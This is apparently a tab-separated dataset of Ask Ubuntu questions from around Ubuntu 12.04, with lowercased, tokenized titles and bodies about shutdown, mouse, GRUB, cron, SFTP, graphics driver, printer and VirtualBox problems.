143638	ubuntu 12.04 does n't turn off ( halt ) under esxi 5.0u1	i 've installed ubuntu 12.04 x64 ( server ) on my esxi 5.0u1 server and it 's mostly working fine except when i try to turn off the system using the halt command ( /sbin/halt ) it says `` powering off ... '' but the virtual machine never actually turns off . if i use the vmware tools to shutdown the host it does turn off , but /sbin/halt worked in every other ubuntu version and also works in debian so it should work now ... anybody have any suggestions ? edit : after further testing , `` halt -p '' , `` shutdown -h now '' , and `` poweroff '' all correctly power-off the machine but `` halt '' ( without parameters ) does not . however , in ubuntu 10.04 , `` halt '' did power-off the machine . is this simply a difference between the two versions of ubuntu ?
143640	my screen does n't turn off when vlc is open	i recently installed 12.04 , but i had the same problem in 11.10 . when i watch a video , vlc suppresses the monitor being turned off . in older ( pre-unity ) ubuntu versions , this would only be in effect while the video was playing . now vlc is disabling the turning off of the monitor regardless of if it is playing or not . is there a way to fix this ? or a less quirky shell ? or a video player that does n't exhibit this behaviour ?
143641	steelseries sensei side buttons freezes the mouse	when i press one of the righthand side buttons ( not the usual back/forward buttons ) the mouse freezes , and the -22 error ( see below ) comes up in dmesg . when i remove the mouse and put it in again it works , but the buttons still freezes the mouse . i could n't find any useful information on either error -22 or concerning the sensei mouse . this is from dmesg after boot : [ 2.473271 ] input : la-view technology steelseries as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.6/2-1.6:1.0/input/input3 [ 2.473445 ] generic-usb 0003:1038:1361.0001 : input , hidraw0 : usb hid v1.00 mouse [ la-view technology steelseries ] on usb-0000:00:1d.0-1.6/input0 [ 2.474360 ] generic-usb : probe of 0003:1038:1361.0002 failed with error -22 [ 2.474427 ] usbcore : registered new interface driver usbhid [ 2.474493 ] usbhid : usb hid core driver xinput list-props 8 yields : device 'la-view technology steelseries ' : device enabled ( 142 ) : 1 coordinate transformation matrix ( 144 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 271 ) : 0 device accel constant deceleration ( 272 ) : 3.000000 device accel adaptive deceleration ( 273 ) : 1.000000 device accel velocity scaling ( 274 ) : 10.000000 device product id ( 260 ) : 4152 , 4961 device node ( 261 ) : `` /dev/input/event3 '' evdev axis inversion ( 275 ) : 0 , 0 evdev axes swap ( 277 ) : 0 axis labels ( 278 ) : `` rel x '' ( 152 ) , `` rel y '' ( 153 ) , `` rel horiz wheel '' ( 269 ) , `` rel vert wheel '' ( 270 ) button labels ( 279 ) : `` button left '' ( 145 ) , `` button middle '' ( 146 ) , `` button right '' ( 147 ) , `` button wheel up '' ( 148 ) , `` button wheel down '' ( 149 ) , `` button horiz wheel left '' ( 150 ) , `` button horiz wheel right '' ( 151 ) , `` button side '' ( 264 ) , `` button extra '' ( 265 ) , `` button forward '' ( 266 ) , `` button back '' ( 267 ) , `` button task '' ( 268 ) , `` button unknown '' ( 263 ) , `` button unknown '' ( 263 ) , `` button unknown '' ( 263 ) , `` button unknown '' ( 263 ) evdev middle button emulation ( 280 ) : 0 evdev middle button timeout ( 281 ) : 50 evdev third button emulation ( 282 ) : 0 evdev third button emulation timeout ( 283 ) : 1000 evdev third button emulation button ( 284 ) : 3 evdev third button emulation threshold ( 285 ) : 20 evdev wheel emulation ( 286 ) : 0 evdev wheel emulation axes ( 287 ) : 0 , 0 , 4 , 5 evdev wheel emulation inertia ( 288 ) : 10 evdev wheel emulation timeout ( 289 ) : 200 evdev wheel emulation button ( 290 ) : 4 evdev drag lock buttons ( 291 ) : 0 update 1 : i have now tried to sniff the usb packets to see what 's going on when i press the buttons that freeze the mouse . i 've put them below : no . time source destination protocol length info 199479 390.237182 6.1 host usb 64 urb_interrupt in frame 199479 : 64 bytes on wire ( 512 bits ) , 64 bytes captured ( 512 bits ) usb urb urb id : 0xffff8801ca55ba80 urb type : urb_complete ( 'c ' ) urb transfer type : urb_interrupt ( 0x01 ) endpoint : 0x81 , direction : in 1 ... ... . = direction : in ( 1 ) .000 0001 = endpoint value : 1 device : 6 urb bus id : 2 device setup request : not relevant ( '- ' ) data : present ( 0 ) urb sec : 1343162038 urb usec : 333931 urb status : protocol error ( -eproto ) ( -71 ) urb length [ bytes ] : 0 data length [ bytes ] : 0 [ request in : 194548 ] [ time from request : 23.890818000 seconds ] no . time source destination protocol length info 199480 390.251625 host 6.1 usb 64 urb_interrupt in frame 199480 : 64 bytes on wire ( 512 bits ) , 64 bytes captured ( 512 bits ) usb urb urb id : 0xffff8801ca55ba80 urb type : urb_submit ( 's ' ) urb transfer type : urb_interrupt ( 0x01 ) endpoint : 0x81 , direction : in 1 ... ... . = direction : in ( 1 ) .000 0001 = endpoint value : 1 device : 6 urb bus id : 2 device setup request : not relevant ( '- ' ) data : not present ( ' < ' ) urb sec : 1343162038 urb usec : 348374 urb status : operation now in progress ( -einprogress ) ( -115 ) urb length [ bytes ] : 8 data length [ bytes ] : 0 [ response in : 199481 ] no . time source destination protocol length info 199481 390.255254 6.1 host usb 64 urb_interrupt in frame 199481 : 64 bytes on wire ( 512 bits ) , 64 bytes captured ( 512 bits ) usb urb urb id : 0xffff8801ca55ba80 urb type : urb_complete ( 'c ' ) urb transfer type : urb_interrupt ( 0x01 ) endpoint : 0x81 , direction : in 1 ... ... . = direction : in ( 1 ) .000 0001 = endpoint value : 1 device : 6 urb bus id : 2 device setup request : not relevant ( '- ' ) data : present ( 0 ) urb sec : 1343162038 urb usec : 352003 urb status : protocol error ( -eproto ) ( -71 ) urb length [ bytes ] : 0 data length [ bytes ] : 0 [ request in : 199480 ] [ time from request : 0.003629000 seconds ] no . time source destination protocol length info 199488 390.279626 host 6.1 usb 64 urb_interrupt in frame 199488 : 64 bytes on wire ( 512 bits ) , 64 bytes captured ( 512 bits ) usb urb urb id : 0xffff8801ca55ba80 urb type : urb_submit ( 's ' ) urb transfer type : urb_interrupt ( 0x01 ) endpoint : 0x81 , direction : in 1 ... ... . = direction : in ( 1 ) .000 0001 = endpoint value : 1 device : 6 urb bus id : 2 device setup request : not relevant ( '- ' ) data : not present ( ' < ' ) urb sec : 1343162038 urb usec : 376375 urb status : operation now in progress ( -einprogress ) ( -115 ) urb length [ bytes ] : 8 data length [ bytes ] : 0 [ response in : 199489 ] no . time source destination protocol length info 199489 390.283255 6.1 host usb 64 urb_interrupt in frame 199489 : 64 bytes on wire ( 512 bits ) , 64 bytes captured ( 512 bits ) usb urb urb id : 0xffff8801ca55ba80 urb type : urb_complete ( 'c ' ) urb transfer type : urb_interrupt ( 0x01 ) endpoint : 0x81 , direction : in 1 ... ... . = direction : in ( 1 ) .000 0001 = endpoint value : 1 device : 6 urb bus id : 2 device setup request : not relevant ( '- ' ) data : present ( 0 ) urb sec : 1343162038 urb usec : 380004 urb status : protocol error ( -eproto ) ( -71 ) urb length [ bytes ] : 0 data length [ bytes ] : 0 [ request in : 199488 ] [ time from request : 0.003629000 seconds ] no . time source destination protocol length info 199504 390.331599 host 6.1 usb 64 urb_interrupt in frame 199504 : 64 bytes on wire ( 512 bits ) , 64 bytes captured ( 512 bits ) usb urb urb id : 0xffff8801ca55ba80 urb type : urb_submit ( 's ' ) urb transfer type : urb_interrupt ( 0x01 ) endpoint : 0x81 , direction : in 1 ... ... . = direction : in ( 1 ) .000 0001 = endpoint value : 1 device : 6 urb bus id : 2 device setup request : not relevant ( '- ' ) data : not present ( ' < ' ) urb sec : 1343162038 urb usec : 428348 urb status : operation now in progress ( -einprogress ) ( -115 ) urb length [ bytes ] : 8 data length [ bytes ] : 0 [ response in : 199505 ] no . time source destination protocol length info 199505 390.335256 6.1 host usb 64 urb_interrupt in frame 199505 : 64 bytes on wire ( 512 bits ) , 64 bytes captured ( 512 bits ) usb urb urb id : 0xffff8801ca55ba80 urb type : urb_complete ( 'c ' ) urb transfer type : urb_interrupt ( 0x01 ) endpoint : 0x81 , direction : in 1 ... ... . = direction : in ( 1 ) .000 0001 = endpoint value : 1 device : 6 urb bus id : 2 device setup request : not relevant ( '- ' ) data : present ( 0 ) urb sec : 1343162038 urb usec : 432005 urb status : protocol error ( -eproto ) ( -71 ) urb length [ bytes ] : 0 data length [ bytes ] : 0 [ request in : 199504 ] [ time from request : 0.003657000 seconds ] update 2 : i 've just tried rebooting from windows ( not shutting down and booting again mind you ) - and now the mouse registers fine with the extra buttons ( they 're btn 10 and 11 ) . i 've had a similar thing happen to my touchpad on my laptop ( where it behaved differently after rebooting from windows - though not for the better in that situation ) . i think the rationale were that there must 've been some kind of ram/rom in the hardware which stored some driver specific stuff and which did n't get cleared properly on a reboot . i have no idea if this would help anyone , but now it 's documented .
143642	how to backup programs without using apt cache ?	is there any way to backup installed software , install a fresh ubuntu system , and restore the software on the newly installed system , without an internet connection ? i already cleared my apt cache .
143643	my laptop starts heating up using every version of ubuntu	i have a dell xpsl502x , and i 'm facing issues using a lot of hardware resources and not making my computer melt down , it has 8gb ram memory , 2gh i7 intel , and ... . why the hell it 's acting like this ... ? though i have to mention it can not recognize my graphic card , the only variant that could recognize my graphic card so far was sabayon on gentoo ... anyway ... if u use sth like a system hardware monitor which is the default app in gnome for monitoring being used resources like ram , hard , cpu , ... , this is what happens to me : suddenly cpu 's rate goes to top and the x starts to really slow down , my laptop starts heating up , and it gets really really hot ... do u have any idea ... ?
143645	is there anything like online ubuntu o/s	i use 64 bit ubuntu 12.04 but sometimes i need 32 bit ubuntu for some specific purpose . so i keep 32 bit ubuntu installed in virtual box . i wonder if there is any service like online ubuntu where we could make an account , connect using ssh etc and use it just like our own pc .
143651	burning ubuntu 12.04 in windows	i have windows 7 , and when i attempt to download ubuntu from the official site , it is indicated that i will get an .iso file , which you burn to the disk . but , i did not get an .iso file after i downloaded it . so , should i just copy the downloaded data to the cd-r ?
143652	changing the time , what files get edited ?	what unix files are associated with the system time/date ? if i ( or an installation process ) changed the system time , what files would actually get accessed and modified ? i think the only thing i found is that timezone is saved in etc/timezone
143656	emulator pcsx reloaded - fullscreen not working on unity	i have an older ps1 console with a couple of games i bought some years ago . on my pc , i 'm using pcsx reloaded - the best ps1 emulators for linux i found so far . but i 'm having a little issue on ubuntu 12.04 precise . i 'm using unity 3d and i 'm trying to run some of my original ps1 games on pcsx reloaded . everything works nicely , except for fullscreen . i toggle fullscreen and specify maximum resolution for my monitor , but on fullscreen mode , both left and top unity bars are n't getting hidden . i tried changing between other graphic modes like gnome classic and gnome classic w/o effects . on both , pcsx shows bars in fullscreen mode , so it is n't an unity-specific issue , but an emulator problem . it 's a bit annoying play games this way , so basically i 'm running games on window mode for now . i 'm using default opengl graphic plugin on this emulator . i tried changing to x11 graphic plugin and fullscreen worked , but graphics on x11 plugin are n't as good as opengl one . anyone know a way to get fullscreen working on pcsx using opengl plugin ? or maybe another graphic plugin w/ opengl support .
143659	gedit clears contents of clipboard on exit - how to keep it ?	use case : i 'm writing an email , and need a snippet from a text file . open the file in gedit ( or kate , for that matter ) and copy the desired snippet . close text editor , return to email . paste snippet into email -- oh wait ! nothing is pasted , apparently because closing the text editor causes the clipboard to empty . not my intention ! what does work : 4b . return to email , paste snippet , back to editor , close editor . i ca n't figure out if there is a way to prevent gedit ( and/or kate ) from clearing the clipboard , or how else to avoid step 4b which seems a rather roundabout way to work around an unintuitive behaviour . help ? ps . apologies , i know that this is not directly related to ubuntu , but my google-fu is weak and i do n't know where else i 'll find an expertly answer ( or any answer at all , seriously , how do you search for something like that ? ) . right now , i 'm on linux mint 11 lxde , but i 've suffered from the same on stock ubuntu and kubuntu as well . pps . to me this behaviour seems very unnatural , but i see it here and there in linux : also in the kde screenshot tool ( substitute `` image '' for `` snippet '' and `` image editor '' for `` email '' ) . is it really just me ?
143660	cursor only moving horizontally on a macbook 6.2 with ubuntu 12.04	after installing ubuntu 12.04 on a macbook pro 6.2 , the touchpad and external usb mouse worked perfectly . after restarting the system , i ca n't get either touchpad or external usb mouse to work . sometimes there is no cursor , but more often i can only move the cursor horizontally â  of the way across the monitor from the top left . i have uninstalled mouseemu . xinpu list shows the usb mouse . xinput query-state for the usb mouse shows the following : buttonclass button [ 1 ] =up ... button [ 16 ] =up valuatorclass mode=relative proximity=in valuator [ 0 ] =480 valuator [ 1 ] =2400 valuator [ 2 ] =0 valuator [ 3 ] =3 and re-issuing this command with the pointer at its right hand extreme displays the same except for : valuator [ 0 ] =1679 so the valuator [ 0 ] seems to be the x-coordinate of the cursor and the range of motion 480-1679 is indeed about â  of the display width ( 1440 ) . but valuator [ 1 ] is suspiciously large given the display height is 900 . perhaps this is a side-effect of having previously been using a dual monitor although booting with that monitor connected does not help . there are other entries listed under xinput list : virtual core xtest pointer which seems stuck at position ( 840,1050 ) . bcm5974 which seems stuck at position ( 837,6700 ) . removing the bcm5974 module using rmmod disables the touchpad as expected but does not fix the usb mouse problem . after adding the module back , it is stuck at position ( 840,1050 ) instead of ( 837,6700 ) . etc/x11/xorg.conf was generated by nvidia-settings and contains : section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` zaxismapping '' `` 4 5 ''
143661	program uninstalled but still on list to remove	i have installed mysql-server-5.1 from terminal . something went wrong and i had to uninstall it , done . when i type : sudo apt-get remove mysql double tab , it still give me a list with some mysql options , trying to remove them i get this message : here is the list : mysql-common mysql-server-5.1 mysql-workbench-gpl and this is the message reading package lists ... done building dependency tree reading state information ... done package mysql-server-5.1 is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 3 not upgraded . is it really removed ? if so , is there a way to remove it from the list ?
143666	in what order do cron jobs with the same schedule run ?	let 's say that i have the following cron jobs : * * * * * /path/to/taskb * * * * * /path/to/taskc * * * * * /path/to/taska is there any guarantee to the order in which they will be run ? i 've seen some people say they run in alphabetical order and others say they run in the order they are entered and yet others say they run in parallel . i 'm asking for 10.04 , but if it changes in others , i 'd like to know that too .
143667	boot error > no such device : grub rescue	after an installation of ubuntu 12.04 , erasing an old partition with ubuntu 10.10 , i ca n't get grub to load . i ca n't access my windows 7 partition either i get the message : > error : no such device : 58abf29c ... grub rescue > i suppose my master boot record got erased/corrupted . how can i check and fix this ?
143674	how do i change the color of the unity upper panel ?	i was looking for this for a long time but i could n't find anything . please tell me how to change the color of unity 's menu bar if it is possible . not the left panel ( launcher ) , i mean the panel on the top of the unity desktop .
143675	can a directory belong to more than one group ?	can a directory belong to more than one group ? ( on windows it seems possible - but when i do an ls - it looks like there is only one group available . )
143678	i receive the error 'grub-install /dev/sda failed ' while attempting to install ubuntu as the computer 's only os .	i am attempting to install ubuntu on a box which was previously running windows 7 . i have also experienced the dreaded `` unable to install grub '' error . i am not attempting to dual boot . i have previously run a windows boot disk and removed all existing partitions . if i run the ubuntu 12.04 install cd and click install after the config screens , i get the error executing 'grub-install /dev/sda ' failed . this is a fatal error . ( it is the same error as this question : unable to install grub ) all the questions i 've read while looking for a solution are related to dual boot . i 'm not interested in dual boot , i 'm after a clean out the box ubuntu install . how can i achieve this ? ( for my sanity , please use very simple instructions when responding . i do n't claim to have any talent either for linux or as a sysadmin ) additional details copied from comments dated : 2012-05-29 ~15:19z after booting from the cd , clicking try ubuntu , and then sudo fdisk /dev/sda i get fdisk : unable to seek on /dev/sda : invalid argument sudo fdisk /dev/sdb gives device contains neither a valid dos partiion table , nor sun , sgi or osf disklabel . building a new dos disklabel with disk identifier 0x15228d1d . changes will remain in memory only until you decide to write them . after that of course , the previous content wo n't be recoverable . warning : invalid flag 0x0000 of partition table 4 will be corrected by w ( rite ) . command ( m for help ) : i should add the live cd desktop is graphically bad . i 've got missing parts of programs and the terminal occasionally reflects to the bottom of the screen . but i ca n't imagine this is related .
143682	cron job fails for any time other than default * * * * *	on ubuntu 11.10 ( oneiric ocelot ) , my cron job run fine if i use the default * * * * * but if i want it to run at 17 hrs or any other time , it never runs . my settings are : 00 17 * * * wget http : //www.abc.com/a.php i also tried : 00 17 * * * root wget http : //www.abc.com/a.php i also tried specifying the path . there is a carriage return , and i 'm logged in as root here is my complete crontab : tz=australia/sydney 22 7 * * * /usr/bin/wget http : //www.abc.com/a.php 22 7 * * * /bin/date > > /tmp/date.txt -- -- the out put is as follws : root @ scrunch : ~ # sudo crontab -l -u root 55 12 * * * date > > /tmp/crontest.txt root @ scrunch : ~ # why is the terminal displaying so many blank lines after outputting the crontab entries ? do you suspect unnecessary carriage lines are given ... .and i have not given any entries any other cron spaces like .d , /daily eyc. ,
143684	how to install windows media encoder 9 series	i want to install windows media encoder 9 series on ubuntu , but wine is not running the .exe file . a popup says , this version of windows media encoder can only be installed on a computer running microsoft windows xp i also used this command but it did n't work : sudo apt-get install wmencoder how can i do it ?
143687	is there a way to clear password mid-entry ?	i understand that a standard terminal security feature is to not show '* 's or indicate any kind of progress of password input . if i know that i have typed a password wrong , rather than having to hit enter and wait for the form to ask me again , is there a way to remove all hidden input ?
143697	changes to user 's home directory not updating	i 've just made changes to a user 's home directory ( using usermod -d ) - but i 'm still going to the old directory when i login ( via sftp ) . do i need to restart a user service to pick up these changes ? ( i 've got the match user ... chrootdirectory settings in sshd_config pointing to the parent of the user 's home directory as well . ) jg
143700	granting a sftp user access to a /var/www directory	i 've created a user and made his home directory /var/www/mysite/ftpdir i 've also added a match user entry for this user in sshd_config with a chrootdirectory that points to /var/www/mysite i 've restarted ssh to pick this up . when i log in with sftp - the user still goes to the user 's old directory ie /home/user what am i missing ?
143707	quickly minimize/hide all windows , preferably with mouse - 11.10 specifc	how can i minimize/hide all my windows quickly , same as moving mouse to lower right in windows xp ? i do n't want a command-line option . ideally , i want to move the mouse to trigger it , or perhaps click the mouse . i ca n't use a trackpad/touchpad solution since i use an external mouse .
143708	should i trust these packages and ppas ?	should i trust these packages and ppas on oneiric amd64 ? ppa : ppa : webupd8team/jupiter ppa : atareao/atareao ppa : webupd8team/gnome3 ppa : webupd8team/java sudo apt-add-repository ppa : ubuntu-x-swat/x-updates packages from ppa above : jupiter gnome-shell-extensions calendar-indicator oracle-java7-installer indicator-weather lo-menubar xscreensaver xscreensaver-gl-extra xscreensaver-data-extra gimp gimp-plugin-registry gimp-resynthesizer
143715	putty login to ubuntu server using ppk	i would like to login to our ubuntu server 9 using a ppk from putty . is there a simple guide i can follow as i keep getting the message server refused our key ? this is all setup as someone here can login using this way . but the person that set the system up has left now with no instruction .
143718	mount : you must specify the filesystem type	i want to mount a partition to an auxiliary folder via mount to fix a damaged grub . i used the command . sudo mount /dev/sdb2 /home/ubuntu/temp and got as error : mount : you must specify the filesystem type why ?
143720	how can i install ubuntu without using the wubi installer ?	i have read a danish book about ubuntu . it seemed quite `` easy '' so i have decided that i want to erase windows 7 ( actually windows 8 consumer preview ) completely and install ubuntu . the problem is that i only could find wubi installers on the webpage . what to do ?
143728	how to access dungeon crawl `` morgue '' ( files for past games ) ?	i recently got a small game from software center called dungeon crawl and i ca n't figure out how to view my past games . it says the morgue file ( of game'overs ) is in the /home/owner/.crawl/morgue/ directory , but i ca n't find it at all . i 'm running ubuntu 12.04 . how can i find this directory ?
143732	2.1 bass configurations for ubuntu 12.04 ?	i bought logitech s220 2.1 . the system includes a subwoofer . it works on windows os but i ca n't get the same quality on linux 12.04 . as i see , there are 5 options ( 2 , 4.1 , 4 , 5.1 , 5 ) but i think it requires 2.1 .
143733	how to remove docky anchor icon ?	i can find answers all around the internet for doing it with gconf-editor in older versions of ubuntu , but i ca n't find the answer for doing it with dconf-editor in latest release . help ?
143735	i 'm running in low graphics mode on ubuntu 12.04 , i have and nvidia fx 5500	so , i 'm running ubuntu along xp and i have an nvidia geforce fx 5500 graphic card , in the normal boot it does not work i see a bad image screen , but if i open in recovery mode it works , but in low graphics mode . how can i make it work properly , it want let me install the latest nvidia drivers for my card , can someone help me ?
143736	add ppa with xubuntu packages to ubuntu 12.04	if i 'm using the normal ubuntu ( not xubuntu ) 12.04 can i add without getting trouble a xubuntu ppa like https : //launchpad.net/~xubuntu-dev/+archive/xfce-4.10 ?
143740	where can i download ubuntu one for android as an apk ?	the android on my phone is modded , does not have google marketplace and i do n't want to install it . where can i download an apk to install ubuntu one on android ?
143744	failed install 12.04 on intel hardware raid with large partition ( > 2tb )	i have intel hardware raid on the motherboard . i have 10 2 tb hdd that i 've configured as raid 1+0 to be one big 8 tb hdd . now i 'm trying to install ubuntu 12.04 on it . after installing with default desktop installation disk i get a blank screen with a cursor flashing . if i try the alternate guided partitioning option i get error : out of disk . and the grub > prompt . if i boot with the rescue disk or such like i can drop into a shell and view the disk . everything also installs without an issue . do n't know what to do ...
143749	there is other ways to install ubuntu ? ( not wubi , not live cd )	i had problems while installing ubuntu 12.04 on a samsung laptop , the problem is the ahci sysmtem , after a lot of searching , i found that this is almost impossible to `` fix '' and the only way i found is too much work . i want to install ubuntu in the 110gb free partition of my hard drive , along with windows . i have a 150gb windows partition , a 200gb documents partition , and i want to use 110 gb for ubuntu . the problem is that with the livecd the installer and gparted shows that my entire hard drive is unallocated ( the problem of ahci ) . the only way to fix this is to do a lot of work , with a lot of risk , so the question is whether i can install ubuntu without using either the livecd or wubi .
143750	ca n't print ( no drivers found )	translation hello , i have had serious printing problems . did not think that most printers do n't work in ubuntu . i changed operating system with the will to learn more about linux seen as i have always worked with microsoft , whom i am really sick off with so much exclusivity with anything , including manufacturers and dealers . there are several printers in this company like the kyocera 1016 , 1820 , tm-u series and hp scanners . with the scanners i already made them work with xsane but still having problems with kyocera and tmu . i have installed the generic tmu drivers , even in raw and it has been impossible to print out the receipt . i tried giving the lp port permissions but it wo n't allow me . i have looked for the drivers in internet with no luck . what can i do because , either there are no drivers for this type of printers or because they are very rare to find . i think that ubuntu is a great os , although it would be even greater and i would be very grateful if this printers worked . i started this project in this company because my boss has no microsoft licenses , not even for the office suite and linux is the best choice since it is free . thanks , pablo original hola , he tenido serio problemas con las impresoras . no pense que en ubuntu la mayoria de las impresoras no funcionaran . he cambiado a este sistema con animo de aprender mas de linux ya que siempre he trabajado con microsoft , el cual me tiene hasta el tope con tanta exclusividad para todo , incluso hasta con los proveedores y fabricantes . hay varios tipos de impresoras en esta empresa como la kyocera 1016 , 1820 , tm-u ... series y scanners hp . ya con el scanner logre que trabajara con xsane super bien , pero la kyocera y las tmu no . he instalado las tmu como genericas , tambien en raw y ha sido imposible que salga la factura . trato de darle permiso al puerto lp y tampoco deja , he buscado controladores para linux en internet pero definitivamente me ha sido imposible . que puedo hacer porque no existen drivers para este tipo de impresoras o bien porque casi no se consiguen . me parece que ubuntu es un buen so , aunque si es posible lograr imprimir o hacer funcionar correctamente a estas impresoras les estaria agradecido . inicie este proyecto en esta empresa porque el jefe no tiene licencias de microsoft , ni de office para nada y linux es la mejor opcion ya que es libre . gracias , pablo
143751	nvidia driver troubles on geforce2 go at 1600x1200	my system ( dell inspiron 8100 ) uses nvidia nv11 geforce2 go at 1600x1200 . all is working , save i can not get any hardware acceleration , making video playback and animation unbearably slow and jerky . in `` additional drivers '' i show two instances of nvidia binary xorg driver , kernel module and vdpau binary . neither is `` activated '' and when i try to activate i get `` systemerror : e : unable to correct problems , you have held broken packages '' i have no clue what package might have been `` held '' as as far as i know i never refused to allow any upgrades . i would like to simply remove both instances of the binary , but nothing i have tried works . doing an lshw scan for nvidia hardware reports the driver=nouveau . i tried to do the update to the nvidia-current , and remove nouveau , but that failed , leaving me running in 800x600 degraded mode . the nvidia-settings app reported no nvidia driver installed after the update . i tried several attempts to force it , by editing xorg.confg and other hacks with no luck . i think my problems stem from the broken binary drivers inhabiting the additional drivers app , and if i can get them out , the nvidia-current might install correctly . but despite many attempts , i am just stuck . help please ? i am unable to proceed at this point , having exhausted all my own expertise . the system works fairly well , save the lack of acceleration . i just need to get over that little bump and i would be one happy camper . any clue would be most appreciated . thanks , nathan
143767	invisible dvd/cdrom drive	i 'm running ubuntu 11.04 on my toshiba satellite a75-s206 but my dvd/cdrom is not showing . as a result , i 'm unable to install `` precise pangolin '' . how can i reinstall my driver ?
143769	how to install nvidia geforce 610m on ubuntu 10.04 lts	root @ wruslanac-bismillah-rtai : ~/downloads/linux-drivers-acer-4752g/xf86-video-intel-2.14.0 # uname -a linux wruslanac-bismillah-rtai 2.6.32-122-rtai # rtai smp tue jul 27 12:44:07 cdt 2010 i686 gnu/linux root @ wruslanac-bismillah-rtai : ~/downloads/linux-drivers-acer-4752g/xf86-video-intel-2.14.0 # lspci 00:00.0 host bridge : intel corporation device 0104 ( rev 09 ) 00:01.0 pci bridge : intel corporation sandy bridge pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation device 0126 ( rev 09 ) 00:16.0 communication controller : intel corporation cougar point heci controller # 1 ( rev 04 ) ... ... root @ wruslanac-bismillah-rtai : ~/downloads/linux-drivers-acer-4752g/xf86-video-intel-2.14.0 # ./configure checking for xorg ... no configure : error : package requirements ( xorg-server > = 1.6 xproto fontsproto ) were not met : no package 'xorg-server ' found no package 'fontsproto ' found ... . ... . root @ wruslanac-bismillah-rtai : ~/downloads/linux-drivers-acer-4752g/xf86-video-intel-2.14.0 # apt-get install xserver-xorg-video-intel reading package lists ... done building dependency tree reading state information ... done xserver-xorg-video-intel is already the newest version . ... . ... . thank you . wry
143773	ubuntu software center closes seconds after started ?	ubuntu software center closed after 1 second after i opened it . this is what i get when i open it with terminal jeggy @ localhost : ~ $ software-center 2012-05-29 17:33:54,755 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2012-05-29 17:33:54,832 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2012-05-29 17:33:55,217 - softwarecenter.region - warning - failed to use geoclue : 'org.freedesktop.geoclue.error.notavailable : geoclue master client has no usable address providers' 2012-05-29 17:33:55,696 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2012-05-29 17:33:55,891 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 176 , in < module > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1358 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1288 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 149 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 133 , in init_view softwarepane.init_view ( self ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/softwarepane.py '' , line 234 , in init_view self.datadir ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/appdetailsview.py '' , line 886 , in __init__ self._layout_page ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/appdetailsview.py '' , line 1185 , in _layout_page self.pkg_statusbar = packagestatusbar ( self ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/appdetailsview.py '' , line 176 , in __init__ self.progress.set_data ( `` transparent-bg-hint '' , true ) attributeerror : 'progressbar ' object has no attribute 'set_data'
143774	android sdk having trouble with adb	so , i installed the android sdk , eclipse , and the adt . upon firing up eclipse the first time after setting up the adt , this error popped up : [ 2012-05-29 12:11:06 - adb ] /home/drsmith/downloads/android-sdk-linux/platform-tools/adb : error while loading shared libraries : libncurses.so.5 : can not open shared object file : no such file or directory [ 2012-05-29 12:11:06 - adb ] 'adb version ' failed ! /home/drsmith/downloads/android-sdk-linux/platform-tools/adb : error while loading shared libraries : libncurses.so.5 : can not open shared object file : no such file or directory [ 2012-05-29 12:11:06 - adb ] failed to parse the output of 'adb version ' : standard output was : error output was : /home/drsmith/downloads/android-sdk-linux/platform-tools/adb : error while loading shared libraries : libncurses.so.5 : can not open shared object file : no such file or directory [ 2012-05-29 12:11:06 - adb ] /home/drsmith/downloads/android-sdk-linux/platform-tools/adb : error while loading shared libraries : libncurses.so.5 : can not open shared object file : no such file or directory [ 2012-05-29 12:11:06 - adb ] 'adb version ' failed ! /home/drsmith/downloads/android-sdk-linux/platform-tools/adb : error while loading shared libraries : libncurses.so.5 : can not open shared object file : no such file or directory [ 2012-05-29 12:11:06 - adb ] failed to parse the output of 'adb version ' : standard output was : error output was : /home/drsmith/downloads/android-sdk-linux/platform-tools/adb : error while loading shared libraries : libncurses.so.5 : can not open shared object file : no such file or directory i 'm not quite sure how this is . feels weird that there 's a missing library there . i 'm using ubuntu 12.04 . no adb is a pretty big blow as an android developer . how do i fix ?
143776	no internet connectivity in virtual-box with both host and virtual os being 12.04	i have precise 12.04 installed as the host os . in virtualbox , i also have installed 12.04 . i am not able to connect the virtual 12.04 to the host internet . i have tried selecting all the available options in the network adapters ( nat , host only , bridge , etc ) , but non of them is working . in the some options some stuff has to be entered manually , which i do not know what to enter . where am i going wrong in the settings ?
